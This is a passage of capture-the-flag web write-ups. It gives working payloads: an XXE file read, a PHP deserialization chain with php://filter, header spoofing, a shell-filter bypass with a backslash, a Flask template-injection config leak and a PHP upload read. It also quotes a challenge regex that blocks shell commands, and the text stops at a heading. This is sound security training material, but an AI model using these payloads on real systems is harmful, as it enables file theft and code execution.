[NCTF2019]Fake XML cookbook</h1><p>It starts with a login page. After trying SQL injection and SSTI, neither works, so fill in arbitrary data and capture the request.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129230616038.png" alt="image-20251129230616038"></p><p>The request body is parsed as XML: an XXE (XML External Entity injection) vulnerability.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129230655397.png" alt="image-20251129230655397"></p><p>An <code><!ENTITY></code> declaration references a file; the XML parser loads it and substitutes the entity's content. Here it is substituted through the &admin entity, whose value is echoed back in the response.</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?xml version=<span class="string">"1.0"</span> encoding=<span class="string">"utf-8"</span>?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">note</span> [</span></span><br><span class="line"><span class="meta"> <span class="meta"><!ENTITY <span class="keyword">admin</span> <span class="keyword">SYSTEM</span> <span class="string">"file:///flag"</span>></span></span></span><br><span class="line"><span class="meta"> ]></span></span><br><span class="line"><span class="tag"><<span class="name">user</span>></span><span class="tag"><<span class="name">username</span>></span><span class="symbol">&admin;</span><span class="tag"></<span class="name">username</span>></span><span class="tag"><<span class="name">password</span>></span>123<span class="tag"></<span class="name">password</span>></span><span class="tag"></<span class="name">user</span>></span></span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129230828113.png" alt="image-20251129230828113"></p><h1 id="2-MRCTF2020-Ezpop"><a href="#2-MRCTF2020-Ezpop" class="headerlink" title="2.[MRCTF2020]Ezpop"></a>2. [MRCTF2020]Ezpop</h1><p>The source is given directly:</p><figure class="highlight php"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">//flag is in flag.php</span></span><br><span class="line"><span class="comment">//WTF IS THIS?</span></span><br><span 
class="line"><span class="comment">//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95</span></span><br><span class="line"><span class="comment">//And Crack It!</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Modifier</span> </span>{</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$var</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">append</span>(<span class="params"><span class="variable">$value</span></span>)</span>{</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$value</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>-><span class="title function_ invoke__">append</span>(<span class="variable">$this</span>-><span class="keyword">var</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$source</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span>=<span class="string">'index.php'</span></span>)</span>{</span><br><span class="line"> <span 
class="variable language_">$this</span>->source = <span class="variable">$file</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Welcome to '</span>.<span class="variable language_">$this</span>->source.<span class="string">"<br>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>->str->source;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">"/gopher|http|file|ftp|https|dict|\.\./i"</span>, <span class="variable">$this</span>->source)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"hacker"</span>;</span><br><span class="line"> <span class="variable language_">$this</span>->source = <span class="string">"index.php"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable 
language_">$this</span>->p = <span class="keyword">array</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>{</span><br><span class="line"> <span class="variable">$function</span> = <span class="variable language_">$this</span>->p;</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$function</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'pop'</span>])){</span><br><span class="line"> @<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">'pop'</span>]);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$a</span>=<span class="keyword">new</span> <span class="title class_">Show</span>;</span><br><span class="line"> <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>flag.php should be under the web root.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span 
class="title">Modifier</span> </span>{</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$var</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">append</span>(<span class="params"><span class="variable">$value</span></span>)</span>{</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$value</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>-><span class="title function_ invoke__">append</span>(<span class="variable">$this</span>-><span class="keyword">var</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The include() call gives us an entry point to include flag.php directly. To reach it, we need a way to invoke that method.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span 
class="params"></span>)</span>{</span><br><span class="line"> <span class="variable language_">$this</span>->p = <span class="keyword">array</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>{</span><br><span class="line"> <span class="variable">$function</span> = <span class="variable language_">$this</span>->p;</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$function</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Straight to the payload code:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Modifier</span> </span>{</span><br><span class="line"><span class="keyword">protected</span> <span 
class="variable">$var</span>=<span class="string">"php://filter/read=convert.base64-encode/resource=flag.php"</span>;</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$source</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">Show</span>();</span><br><span class="line"><span class="variable">$a</span>->source = <span class="keyword">new</span> <span class="title class_">Show</span>();</span><br><span class="line"><span class="variable">$a</span>->source->str = <span class="keyword">new</span> <span class="title class_">Test</span>();</span><br><span class="line"><span class="variable">$a</span>->source->str->p = <span class="keyword">new</span> <span class="title class_">Modifier</span>();</span><br><span class="line"> </span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>));</span><br><span class="line"> </span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129231515722.png" alt="image-20251129231515722"></p><p>Base64-decode the output to get the FLAG.</p><h1 id="3-MRCTF2020-PYWebsite-【IP-信任漏洞】"><a href="#3-MRCTF2020-PYWebsite-【IP-信任漏洞】" class="headerlink" title="3.[MRCTF2020]PYWebsite 【IP 信任漏洞】"></a>3. [MRCTF2020]PYWebsite [IP trust vulnerability]</h1><p>It really just comes down to setting X-Forwarded-For to 127.0.0.1 ()</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232204747.png" alt="image-20251129232203925"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><script></span><br><span class="line"></span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">enc</span>(<span 
class="params">code</span>){</span><br><span class="line"> hash = <span class="title function_">hex_md5</span>(code);</span><br><span class="line"> <span class="keyword">return</span> hash;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">validate</span>(<span class="params"></span>){</span><br><span class="line"> <span class="keyword">var</span> code = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">"vcode"</span>).<span class="property">value</span>;</span><br><span class="line"> <span class="keyword">if</span> (code != <span class="string">""</span>){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_">hex_md5</span>(code) == <span class="string">"0cd4da0223c0b280829dc3ea458d655c"</span>){</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"您通过了验证!"</span>);</span><br><span class="line"> <span class="variable language_">window</span>.<span class="property">location</span> = <span class="string">"./flag.php"</span></span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"你的授权码不正确!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"请输入授权码"</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> </script></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Accessing flag.php directly fails, as expected.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232301573.png" 
 alt="image-20251129232301573"></p><p>"Except the buyer and me" suggests the check is for local access, so set X-Forwarded-For: 127.0.0.1</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232407046.png" alt="image-20251129232407046"></p><p>Success.</p><h1 id="4-安洵杯-2019-easy-web"><a href="#4-安洵杯-2019-easy-web" class="headerlink" title="4.[安洵杯 2019]easy_web"></a>4. [安洵杯 2019]easy_web</h1><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129232730810.png" alt="image-20251129232730810"></p><p>Looking at the URL: <a href="http://5cefc48c-a491-4714-9471-ff016b33d1ea.node5.buuoj.cn:81/index.php?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=">http://5cefc48c-a491-4714-9471-ff016b33d1ea.node5.buuoj.cn:81/index.php?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=</a></p><p>There are img and cmd parameters. After some testing, the img parameter turns out to be base64-decoded twice and then hex-decoded once.</p><p>It decodes to 555.png. Presumably the page opens that file, so change it to index.php, which encodes to TmprMlJUWTBOalUzT0RKRk56QTJPRGN3</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(E_ALL || ~ E_NOTICE);</span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">'content-type:text/html;charset=utf-8'</span>);</span><br><span class="line"><span class="variable">$cmd</span> = <span class="variable">$_GET</span>[<span class="string">'cmd'</span>];</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'img'</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'cmd'</span>]))</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">hex2bin</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_GET</span>[<span class="string">'img'</span>])));</span><br><span class="line"></span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">"/[^a-zA-Z0-9.]+/"</span>, <span class="string">""</span>, <span class="variable">$file</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">"/flag/i"</span>, <span class="variable">$file</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<img src ="./ctf3.jpeg">'</span>;</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"xixi~ no flag"</span>);</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span 
class="line"> <span class="variable">$txt</span> = <span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$file</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<img src='data:image/gif;base64,"</span> . <span class="variable">$txt</span> . <span class="string">"'></img>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$cmd</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">"/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i"</span>, <span class="variable">$cmd</span>)) {</span><br><span class="line"> <span class="keyword">echo</span>(<span class="string">"forbid ~"</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> ((<span class="keyword">string</span>)<span class="variable">$_POST</span>[<span class="string">'a'</span>] !== (<span class="keyword">string</span>)<span class="variable">$_POST</span>[<span class="string">'b'</span>] && <span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">'a'</span>]) === <span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">'b'</span>])) {</span><br><span class="line"> <span 
class="keyword">echo</span> `<span class="variable">$cmd</span>`;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> (<span class="string">"md5 is funny ~"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>MD5 strong-comparison bypass plus some filtering</p><p>About the regex here:</p><p>We can see that it bans tac, nl, more, less, head, tail, cat, od and other keywords that could read file contents. Look at the |\|\\| near the end: we all know that to filter a backslash in a PHP regex you have to write four \ characters, because the string is parsed twice, once by the PHP parser and once by the regex engine.</p><p>\\ is first parsed by PHP into \ and then by the regex engine into \. But there is one more \ in front of it, which PHP parses into \; since | is a reserved character in regex it can be escaped, so when the regex engine parses it, that \ is taken together with the following | and becomes a literal |. This is exactly where the problem lies: taken as a whole, PHP parses it into ||\| and the regex engine then parses that into |||, so what finally gets matched is |\ rather than \, which means we can bypass the filter with a backslash.</p><p>cmd=dir / cmd=ca\t</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233214029.png" alt="image-20251129233214029"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233225018.png" alt="image-20251129233225018"></p><h1 id="6-WesternCTF2018-shrine"><a href="#6-WesternCTF2018-shrine" class="headerlink" title="6.[WesternCTF2018]shrine"></a>6.[WesternCTF2018]shrine</h1><p>The source is given at the start.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line"></span><br><span class="line">app.config[<span class="string">'FLAG'</span>] = os.environ.pop(<span class="string">'FLAG'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"><span class="keyword">return</span> <span class="built_in">open</span>(__file__).read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/shrine/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">shrine</span>(<span class="params">shrine</span>):</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">safe_jinja</span>(<span class="params">s</span>):</span><br><span class="line">s = s.replace(<span class="string">'('</span>, <span class="string">''</span>).replace(<span class="string">')'</span>, <span class="string">''</span>)</span><br><span class="line">blacklist = [<span class="string">'config'</span>, <span class="string">'self'</span>]</span><br><span class="line"><span class="keyword">return</span> <span class="string">''</span>.join([<span class="string">'{{% set {}=None%}}'</span>.<span class="built_in">format</span>(c) <span class="keyword">for</span> c <span class="keyword">in</span> blacklist]) + s</span><br><span class="line"><span class="keyword">return</span> flask.render_template_string(safe_jinja(shrine))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> 
__name__ == <span class="string">'__main__'</span>:</span><br><span class="line">app.run(debug=<span class="literal">True</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The challenge gives the Flask source, which contains a <code>FLAG</code> entry in its config.<br> The source has two routes, one of them the <code>/shrine/</code> path; a quick test shows template injection: <code>/shrine/{{2+2}}</code></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233403858.png" alt="image-20251129233403858"></p><p>If there were no blacklist, it could be read with,</p><p>Python sandbox escapes can use the reference relationships between Python objects to reach function objects that have been blocked. Two functions contain the current_app<br> global variable, namely url_for() and get_flashed_messages()</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/shrine/{{url_for.__globals__['current_app'].config}}</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233503256.png" alt="image-20251129233503256"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251129233515563.png" alt="image-20251129233515563"></p><h1 id="7-NewStar2025-week3-小E的秘密计划"><a href="#7-NewStar2025-week3-小E的秘密计划" class="headerlink" title="7.NewStar2025-week3 小E的秘密计划"></a>7.NewStar2025-week3 Little E's Secret Plan</h1><p>The hint mentions a backup file; a direct scan turns up <a href="http://www.zip/">www.zip</a></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130215911889.png" alt="image-20251130215911889"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">require_once</span> <span class="string">'user.php'</span>;</span><br><span class="line"><span class="variable">$userData</span> = <span class="title function_ invoke__">getUserData</span>();</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_METHOD'</span>] === <span class="string">'POST'</span>) {</span><br><span class="line"> <span class="variable">$username</span> = <span class="variable">$_POST</span>[<span class="string">'username'</span>] ?? <span class="string">''</span>;</span><br><span class="line"> <span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">'password'</span>] ?? <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$username</span> === <span class="variable">$userData</span>[<span class="string">'username'</span>] && <span class="variable">$password</span> === <span class="variable">$userData</span>[<span class="string">'password'</span>]) {</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: /secret-xxxxxxxxxxxxxxxxxxx'</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'登录失败,在git里找找吧'</span>;</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The hint says to look in git.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221418486.png" 
alt="image-20251130221418486"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git reflog show --all</span><br></pre></td></tr></table></figure><p>This records the movement history of every reference, i.e. every operation.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221516574.png" alt="image-20251130221516574"></p><p>The 353b98 branch was deleted; just look at it directly.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221555765.png" alt="image-20251130221555765"></p><p>Read out the password and log straight in.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221633013.png" alt="image-20251130221633013"></p><p>A macOS .DS_Store leak gives the flag file name; read the flag directly.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130221725962.png" alt="image-20251130221725962"></p><p>Success.</p><h1 id="8-NewStar2025-week3-mirror-gate"><a href="#8-NewStar2025-week3-mirror-gate" class="headerlink" title="8.NewStar2025-week3 mirror_gate"></a>8.NewStar2025-week3 mirror_gate</h1><p>This is the first time I have seen a file upload where .htaccess is directly viewable, so I am noting it here.</p><p>A directory scan turns up .htaccess</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130222002361.png" alt="image-20251130222002361"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130222017476.png" alt="image-20251130222017476"></p><p>webp gets executed as php, and after that it is routine: a short-tag bypass</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?=show_source('/flag.php');?></span><br></pre></td></tr></table></figure><p>Flag obtained directly.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130222138660.png" alt="image-20251130222138660"></p><h1 id="9-NewStar2025-week4-SSTI-在哪里?"><a href="#9-NewStar2025-week4-SSTI-在哪里?" 
